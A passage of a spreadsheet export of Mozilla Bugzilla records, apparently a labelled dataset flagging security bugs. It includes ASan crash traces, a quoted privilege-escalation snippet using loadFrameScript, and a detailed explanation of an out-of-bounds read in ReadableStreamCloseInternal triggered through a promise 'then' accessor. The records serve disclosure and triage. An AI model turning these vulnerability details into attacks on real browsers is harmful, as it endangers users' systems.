    #15 0x7fa437f6d461 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #16 0x7fa437ecae00 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #17 0x7fa437ecae00 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #18 0x7fa437ecae00 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #19 0x7fa43d37b80f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #20 0x7fa440c0eea7 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #21 0x7fa437ecae00 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #22 0x7fa437ecae00 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #23 0x7fa437ecae00 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #24 0x7fa440c0e909 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:709:34
    #25 0x4eb7a3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #26 0x4eb7a3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:285
    #27 0x7fa45413d3f0 in __libc_start_main /build/glibc-cxyGtm/glibc-2.24/csu/../csu/libc-start.c:291
==23790==ABORTING</t>
        </is>
      </c>
      <c r="X5164" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5165">
      <c r="A5165" t="n">
        <v>1124898</v>
      </c>
      <c r="B5165" t="inlineStr">
        <is>
          <t>2015-01-22 14:38:26 -0800</t>
        </is>
      </c>
      <c r="C5165" t="inlineStr">
        <is>
          <t>Privileged Window.webidl stuff is exposed based on the docshell type, not the principal of the actual page</t>
        </is>
      </c>
      <c r="D5165" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5165" t="n">
        <v>1</v>
      </c>
      <c r="F5165" t="n">
        <v>1</v>
      </c>
      <c r="G5165" t="n">
        <v>3</v>
      </c>
      <c r="H5165" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5165" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5165" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5165" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5165" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5165" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5165" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5165" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5165" t="inlineStr">
        <is>
          <t>[adv-main37+] Embargo until fixed on ESR31?</t>
        </is>
      </c>
      <c r="Q5165" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5165" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5165" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T5165" t="n">
        <v>1</v>
      </c>
      <c r="U5165" t="n">
        <v>0</v>
      </c>
      <c r="V5165" t="n">
        <v>21</v>
      </c>
      <c r="W5165" t="inlineStr">
        <is>
          <t>From bug 1120261.
&gt;         setTimeout(function(){
&gt;           x.messageManager.loadFrameScript('data:,throw Components.utils',
&gt; false);
This is the most egregious bit, IMO. it looks like Window.webidl puts all of the privileged stuff behind Func="nsGlobalWindow::IsChromeWindow", rather than making it ChromeOnly. This means that, if content can ever get a reference to a chrome window (which it shouldn't, but can happen when paired with another exploit as in this bug), it can navigate that window to its own page, and go wild on chrome-privileged stuff.
Boris, is there any reason for the above? Seems like we should almost certainly fix it.</t>
        </is>
      </c>
      <c r="X5165" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5166">
      <c r="A5166" t="n">
        <v>812161</v>
      </c>
      <c r="B5166" t="inlineStr">
        <is>
          <t>2012-11-15 06:26:35 -0800</t>
        </is>
      </c>
      <c r="C5166" t="inlineStr">
        <is>
          <t>Out of bounds read in nsSVGPathElement::GetPathLengthScale</t>
        </is>
      </c>
      <c r="D5166" t="inlineStr">
        <is>
          <t>2024-05-30 07:51:51 -0700</t>
        </is>
      </c>
      <c r="E5166" t="n">
        <v>1</v>
      </c>
      <c r="F5166" t="n">
        <v>1</v>
      </c>
      <c r="G5166" t="n">
        <v>3</v>
      </c>
      <c r="H5166" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5166" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5166" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5166" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5166" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5166" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5166" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5166" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5166" t="inlineStr">
        <is>
          <t>[asan]wrong type/bad cast [adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q5166" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5166" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5166" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T5166" t="n">
        <v>1</v>
      </c>
      <c r="U5166" t="n">
        <v>0</v>
      </c>
      <c r="V5166" t="n">
        <v>22</v>
      </c>
      <c r="W5166" t="inlineStr">
        <is>
          <t>Created attachment 681969
Testcase
Reproduces on trunk.
=================================================================
==17302== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f39dafcdb51 at pc 0x7f3a091d1adf bp 0x7ffff97a5b90 sp 0x7ffff97a5b88
READ of size 1 at 0x7f39dafcdb51 thread T0
    #0 0x7f3a091d1ade in nsSVGNumber2::IsExplicitlySet() const src/content/svg/content/src/nsSVGNumber2.h:49
    #1 0x7f3a09663aa3 in nsSVGPathElement::GetPathLengthScale(nsSVGPathElement::PathLengthScaleForType) src/content/svg/content/src/nsSVGPathElement.cpp:404
    #2 0x7f3a08d9d082 in nsSVGTextPathFrame::GetOffsetScale() src/layout/svg/nsSVGTextPathFrame.cpp:146
    #3 0x7f3a08ceeb9a in nsSVGGlyphFrame::SetGlyphPosition(gfxPoint*, bool) src/layout/svg/nsSVGGlyphFrame.cpp:1329
    #4 0x7f3a08d95224 in nsSVGTextFrame::UpdateGlyphPositioning(bool) src/layout/svg/nsSVGTextFrame.cpp:474
    #5 0x7f3a08d978a9 in nsSVGTextFrame::ReflowSVG() src/layout/svg/nsSVGTextFrame.cpp:247
    #6 0x7f3a08d979cf in non-virtual thunk to nsSVGTextFrame::ReflowSVG() src/layout/svg/nsSVGTextFrame.cpp:253
    #7 0x7f3a08c63367 in nsSVGDisplayContainerFrame::ReflowSVG() src/layout/svg/nsSVGContainerFrame.cpp:271
    #8 0x7f3a08d51ea8 in nsSVGOuterSVGFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/svg/nsSVGOuterSVGFrame.cpp:450
    #9 0x7f3a02f1d545 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:842
    #10 0x7f3a02eee11c in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:694
    #11 0x7f3a02eeb0d5 in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:557
    #12 0x7f3a02ee7d25 in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:409
    #13 0x7f3a02f1d545 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:842
    #14 0x7f3a02bd4a61 in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) src/layout/generic/nsBlockFrame.cpp:3721
    #15 0x7f3a02bcf0c5 in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) src/layout/generic/nsBlockFrame.cpp:3518
    #16 0x7f3a02bc1d19 in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3372
    #17 0x7f3a02bb102a in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2479
    #18 0x7f3a02b97e57 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:1996
    #19 0x7f3a02b8b143 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1041
    #20 0x7f3a02c777cc in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:952
    #21 0x7f3a02e49e29 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsCanvasFrame.cpp:464
    #22 0x7f3a02c777cc in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:952
    #23 0x7f3a02dbfe28 in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) src/layout/generic/nsGfxScrollFrame.cpp:433
    #24 0x7f3a02dc4986 in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) src/layout/generic/nsGfxScrollFrame.cpp:533
    #25 0x7f3a02dc9020 in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsGfxScrollFrame.cpp:774
    #26 0x7f3a02c777cc in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:952
    #27 0x7f3a031b7fea in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsViewportFrame.cpp:202
    #28 0x7f3a028eae9b in PresShell::DoReflow(nsIFrame*, bool) src/layout/base/nsPresShell.cpp:7532
    #29 0x7f3a0291a94d in PresShell::ProcessReflowCommands(bool) src/layout/base/nsPresShell.cpp:7673
    #30 0x7f3a0291949e in PresShell::FlushPendingNotifications(mozFlushType) src/layout/base/nsPresShell.cpp:3913
    #31 0x7f3a029bfc15 in nsRefreshDriver::Notify(nsITimer*) src/layout/base/nsRefreshDriver.cpp:403
    #32 0x7f3a0efeb393 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:485
    #33 0x7f3a0efec731 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:565
    #34 0x7f3a0efaf3de in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:627
    #35 0x7f3a0ec25a8f in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:221
    #36 0x7f3a0d218776 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #37 0x7f3a0f2976ae in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:215
    #38 0x7f3a0f2974f5 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:208
    #39 0x7f3a0f2973db in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:182
    #40 0x7f3a0c5f8a64 in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #41 0x7f3a0b17fa32 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:290
    #42 0x7f3a006b4e14 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3822
    #43 0x7f3a006baae9 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3889
    #44 0x7f3a006bd860 in XRE_main src/toolkit/xre/nsAppRunner.cpp:4083
    #45 0x40c1e6 in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #46 0x409a20 in main src/browser/app/nsBrowserApp.cpp:279
    #47 0x7f3a1fb9176c in ?? ??:0
0x7f39dafcdb51 is located 9 bytes to the right of 264-byte region [0x7f39dafcda40,0x7f39dafcdb48)
allocated by thread T0 here:
    #0 0x4c3940 in malloc ??:?
    #1 0x7f3a20ba25f1 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7f3a096c7c31 in operator new(unsigned long) src/../../../../dist/include/mozilla/mozalloc.h:200
    #3 0x7f3a090eb1cb in NS_NewSVGElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/svg/content/src/nsSVGElementFactory.cpp:232
    #4 0x7f3a04598d6c in NS_NewElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/base/src/nsNameSpaceManager.cpp:212
    #5 0x7f3a06232a6b in nsXMLContentSink::CreateElement(unsigned short const**, unsigned int, nsINodeInfo*, unsigned int, nsIContent**, bool*, mozilla::dom::FromParser) src/content/xml/document/src/nsXMLContentSink.cpp:467
    #6 0x7f3a0623fff4 in nsXMLContentSink::HandleStartElement(unsigned short const*, unsigned short const**, unsigned int, int, unsigned int, bool) src/content/xml/document/src/nsXMLContentSink.cpp:997
    #7 0x7f3a0623ec5e in nsXMLContentSink::HandleStartElement(unsigned short const*, unsigned short const**, unsigned int, int, unsigned int) src/content/xml/document/src/nsXMLContentSink.cpp:951
    #8 0x7f3a06241b95 in non-virtual thunk to nsXMLContentSink::HandleStartElement(unsigned short const*, unsigned short const**, unsigned int, int, unsigned int) src/content/xml/document/src/nsXMLContentSink.cpp:953
Shadow byte and word:
  0x1fe73b5f9b6a: fb
  0x1fe73b5f9b68: 00 fb fb fb fb fb fb fb
More shadow bytes:
  0x1fe73b5f9b48: 00 00 00 00 00 00 00 00
  0x1fe73b5f9b50: 00 00 00 00 00 00 00 00
  0x1fe73b5f9b58: 00 00 00 00 00 00 00 00
  0x1fe73b5f9b60: 00 00 00 00 00 00 00 00
=&gt;0x1fe73b5f9b68: 00 fb fb fb fb fb fb fb
  0x1fe73b5f9b70: fa fa fa fa fa fa fa fa
  0x1fe73b5f9b78: fa fa fa fa fa fa fa fa
  0x1fe73b5f9b80: fa fa fa fa fa fa fa fa
  0x1fe73b5f9b88: 00 00 00 00 00 00 00 00
Stats: 253M malloced (239M for red zones) by 412251 calls
Stats: 46M realloced by 24186 calls
Stats: 224M freed by 284857 calls
Stats: 189M really freed by 232799 calls
Stats: 230M (59085 full pages) mmaped in 438 calls
  mmaps   by size class: 7:147420; 8:45034; 9:13299; 10:5110; 11:6120; 12:1280; 13:960; 14:544; 15:224; 16:712; 17:456; 18:36; 19:35; 20:21;
  mallocs by size class: 7:267252; 8:86611; 9:23441; 10:8604; 11:16914; 12:2459; 13:1943; 14:1595; 15:413; 16:1542; 17:1345; 18:70; 19:40; 20:22;
  frees   by size class: 7:182188; 8:57665; 9:17102; 10:5439; 11:14824; 12:1611; 13:1505; 14:1424; 15:281; 16:1375; 17:1329; 18:57; 19:38; 20:19;
  rfrees  by size class: 7:155466; 8:44862; 9:10771; 10:3830; 11:11718; 12:1214; 13:1011; 14:1303; 15:216; 16:1017; 17:1295; 18:50; 19:37; 20:9;
Stats: malloc large: 3432 small slow: 5044
==17302== ABORTING</t>
        </is>
      </c>
      <c r="X5166" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5167">
      <c r="A5167" t="n">
        <v>341840</v>
      </c>
      <c r="B5167" t="inlineStr">
        <is>
          <t>2006-06-16 20:53:49 -0700</t>
        </is>
      </c>
      <c r="C5167" t="inlineStr">
        <is>
          <t>microsummary service should cancel connections</t>
        </is>
      </c>
      <c r="D5167" t="inlineStr">
        <is>
          <t>2016-02-12 06:59:33 -0800</t>
        </is>
      </c>
      <c r="E5167" t="n">
        <v>1</v>
      </c>
      <c r="F5167" t="n">
        <v>1</v>
      </c>
      <c r="G5167" t="n">
        <v>6</v>
      </c>
      <c r="H5167" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5167" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J5167" t="inlineStr">
        <is>
          <t>Microsummaries</t>
        </is>
      </c>
      <c r="K5167" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L5167" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5167" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5167" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5167" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5167" t="inlineStr"/>
      <c r="Q5167" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5167" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5167" t="inlineStr">
        <is>
          <t>Firefox 2 beta2</t>
        </is>
      </c>
      <c r="T5167" t="n">
        <v>1</v>
      </c>
      <c r="U5167" t="n">
        <v>0</v>
      </c>
      <c r="V5167" t="n">
        <v>11</v>
      </c>
      <c r="W5167" t="inlineStr">
        <is>
          <t>The microsummary service should cancel connections after a specified timeout, and it should also cancel them when the user closes a window which is loading microsummaries, like the bookmark properties dialog.</t>
        </is>
      </c>
      <c r="X5167" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5168">
      <c r="A5168" t="n">
        <v>91903</v>
      </c>
      <c r="B5168" t="inlineStr">
        <is>
          <t>2001-07-23 07:04:55 -0700</t>
        </is>
      </c>
      <c r="C5168" t="inlineStr">
        <is>
          <t>Insecure dependency in require at importxml.pl line 59.</t>
        </is>
      </c>
      <c r="D5168" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:25 -0800</t>
        </is>
      </c>
      <c r="E5168" t="n">
        <v>1</v>
      </c>
      <c r="F5168" t="n">
        <v>1</v>
      </c>
      <c r="G5168" t="n">
        <v>4</v>
      </c>
      <c r="H5168" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5168" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5168" t="inlineStr">
        <is>
          <t>Bug Import/Export &amp; Moving</t>
        </is>
      </c>
      <c r="K5168" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5168" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5168" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5168" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5168" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5168" t="inlineStr"/>
      <c r="Q5168" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5168" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5168" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T5168" t="n">
        <v>1</v>
      </c>
      <c r="U5168" t="n">
        <v>0</v>
      </c>
      <c r="V5168" t="n">
        <v>5</v>
      </c>
      <c r="W5168" t="inlineStr">
        <is>
          <t>As reported by tinderbox:
Insecure dependency in require while running with -T switch at /home/ianh/
tinderbox/mozilla/webtools/bugzilla/importxml.pl line 59.
This is only killing the Perl 5.00503 tinderbox.  All the 5.6 tinderboxen are 
passing it.  This is a 2.14 release blocker.  Resolution of this bug will require 
either making Perl 5.00503 happy or deciding to require a newer version of Perl.</t>
        </is>
      </c>
      <c r="X5168" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5169">
      <c r="A5169" t="n">
        <v>403331</v>
      </c>
      <c r="B5169" t="inlineStr">
        <is>
          <t>2007-11-10 10:11:46 -0800</t>
        </is>
      </c>
      <c r="C5169" t="inlineStr">
        <is>
          <t>Sort out jar: behavior on HTTP redirects</t>
        </is>
      </c>
      <c r="D5169" t="inlineStr">
        <is>
          <t>2008-03-20 12:35:53 -0700</t>
        </is>
      </c>
      <c r="E5169" t="n">
        <v>1</v>
      </c>
      <c r="F5169" t="n">
        <v>1</v>
      </c>
      <c r="G5169" t="n">
        <v>3</v>
      </c>
      <c r="H5169" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5169" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5169" t="inlineStr">
        <is>
          <t>Networking: JAR</t>
        </is>
      </c>
      <c r="K5169" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5169" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5169" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5169" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5169" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5169" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q5169" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5169" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5169" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5169" t="n">
        <v>1</v>
      </c>
      <c r="U5169" t="n">
        <v>0</v>
      </c>
      <c r="V5169" t="n">
        <v>38</v>
      </c>
      <c r="W5169" t="inlineStr">
        <is>
          <t>Bug 369814 points out that jar: doesn't update its principal (or URI, for that matter) when an HTTP redirect happens.  Arguably, it should.  
The simplest thing to do here seems to be to replace the "jar file" URI with the post-load URI that the channel loading the jar file ends up with (using NS_GetFinalChannelURI).  Then everything else should Just Work, I think.
Does that make sense?</t>
        </is>
      </c>
      <c r="X5169" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5170">
      <c r="A5170" t="n">
        <v>1612308</v>
      </c>
      <c r="B5170" t="inlineStr">
        <is>
          <t>2020-01-30 04:14:16 -0800</t>
        </is>
      </c>
      <c r="C5170" t="inlineStr">
        <is>
          <t>Security: OOB access in js::ReadableStreamCloseInternal</t>
        </is>
      </c>
      <c r="D5170" t="inlineStr">
        <is>
          <t>2020-09-09 03:54:20 -0700</t>
        </is>
      </c>
      <c r="E5170" t="n">
        <v>1</v>
      </c>
      <c r="F5170" t="n">
        <v>1</v>
      </c>
      <c r="G5170" t="n">
        <v>3</v>
      </c>
      <c r="H5170" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5170" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5170" t="inlineStr">
        <is>
          <t>DOM: Networking</t>
        </is>
      </c>
      <c r="K5170" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5170" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5170" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5170" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5170" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5170" t="inlineStr">
        <is>
          <t>[disclosure date is 2020-04-29][post-critsmash-triage][adv-main74+][adv-esr68.6+], [wptsync upstream]</t>
        </is>
      </c>
      <c r="Q5170" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5170" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5170" t="inlineStr">
        <is>
          <t>mozilla75</t>
        </is>
      </c>
      <c r="T5170" t="n">
        <v>1</v>
      </c>
      <c r="U5170" t="n">
        <v>0</v>
      </c>
      <c r="V5170" t="n">
        <v>54</v>
      </c>
      <c r="W5170" t="inlineStr">
        <is>
          <t>Created attachment 9123657
crash.log
VULNERABILITY DETAILS
js/src/builtin/streams/ReadableStreamInternals.cpp:175:
```
MOZ_MUST_USE bool js::ReadableStreamCloseInternal(
    JSContext* cx, Handle&lt;ReadableStream*&gt; unwrappedStream) {
  // Step 1: Assert: stream.[[state]] is "readable".
  MOZ_ASSERT(unwrappedStream-&gt;readable());
  // Step 2: Set stream.[[state]] to "closed".
  unwrappedStream-&gt;setClosed(); // *** 1 ***
  // Step 4: If reader is undefined, return (reordered).
  if (!unwrappedStream-&gt;hasReader()) {
    return true;
  }
  // Step 3: Let reader be stream.[[reader]].
  Rooted&lt;ReadableStreamReader*&gt; unwrappedReader(
      cx, UnwrapReaderFromStream(cx, unwrappedStream));
  if (!unwrappedReader) {
    return false;
  }
  // Step 5: If ! IsReadableStreamDefaultReader(reader) is true,
  if (unwrappedReader-&gt;is&lt;ReadableStreamDefaultReader&gt;()) {
    ForAuthorCodeBool forAuthorCode = unwrappedReader-&gt;forAuthorCode();
    // Step a: Repeat for each readRequest that is an element of
    //         reader.[[readRequests]],
    Rooted&lt;ListObject*&gt; unwrappedReadRequests(cx, unwrappedReader-&gt;requests());
    uint32_t len = unwrappedReadRequests-&gt;length(); // *** 2 ***
    Rooted&lt;JSObject*&gt; readRequest(cx);
    Rooted&lt;JSObject*&gt; resultObj(cx);
    Rooted&lt;Value&gt; resultVal(cx);
    for (uint32_t i = 0; i &lt; len; i++) { // *** 3 ***
      // Step i: Resolve readRequest.[[promise]] with
      //         ! ReadableStreamCreateReadResult(undefined, true,
      //                                          readRequest.[[forAuthorCode]]).
      readRequest = &amp;unwrappedReadRequests-&gt;getAs&lt;JSObject&gt;(i); // *** 4 ***
      if (!cx-&gt;compartment()-&gt;wrap(cx, &amp;readRequest)) {
        return false;
      }
      resultObj = js::ReadableStreamCreateReadResult(cx, UndefinedHandleValue,
                                                     true, forAuthorCode);
      if (!resultObj) {
        return false;
      }
      resultVal = ObjectValue(*resultObj);
      if (!ResolvePromise(cx, readRequest, resultVal)) { // *** 5 ***
        return false;
      }
    }
    // Step b: Set reader.[[readRequests]] to an empty List.
    unwrappedReader-&gt;clearRequests();
  }
  // Step 6: Resolve reader.[[closedPromise]] with undefined.
  if (!ResolveUnwrappedPromiseWithUndefined(cx,
                                            unwrappedReader-&gt;closedPromise())) {
    return false;
  }
  if (unwrappedStream-&gt;mode() == JS::ReadableStreamMode::ExternalSource) {
    // Make sure we're in the stream's compartment.
    AutoRealm ar(cx, unwrappedStream);
    JS::ReadableStreamUnderlyingSource* source =
        unwrappedStream-&gt;controller()-&gt;externalSource();
    source-&gt;onClosed(cx, unwrappedStream); // *** 6 ***
  }
  return true;
}
```
js/src/builtin/streams/ReadableStreamOperations.cpp:187:
```
static bool TeeReaderReadHandler(JSContext* cx, unsigned argc, Value* vp) {
[...]
  // Step 12.c.ix: If canceled1 is false, perform
  //               ? ReadableStreamDefaultControllerEnqueue(
  //                     branch1.[[readableStreamController]], value1).
  if (!unwrappedTeeState-&gt;canceled1()) { // *** 7 ***
    unwrappedController = unwrappedTeeState-&gt;branch1();
    if (!ReadableStreamDefaultControllerEnqueue(cx, unwrappedController,
                                                value1)) {
      return false;
    }
  }
[...]
}
```
The ECMAScript specification requires the promise resolution algorithm to synchronously access the
`then` property of the resolution object. Therefore, when a user defines a corresponding accessor on
`Object.prototype`, a majority of calls to `ResolvePromise` become observable to user JavaScript
code.
`ReadableStreamCloseInternal` fails to take that into account. The function doesn't check whether
the length of the request container[2] remains unchanged after a call to `ResolvePromise`[5] and
uses the original length as the loop exit condition[3]. If an attacker shrinks the container from
inside the promise resolution, `getAs`[4] will access out-of-bounds data during the next iteration.
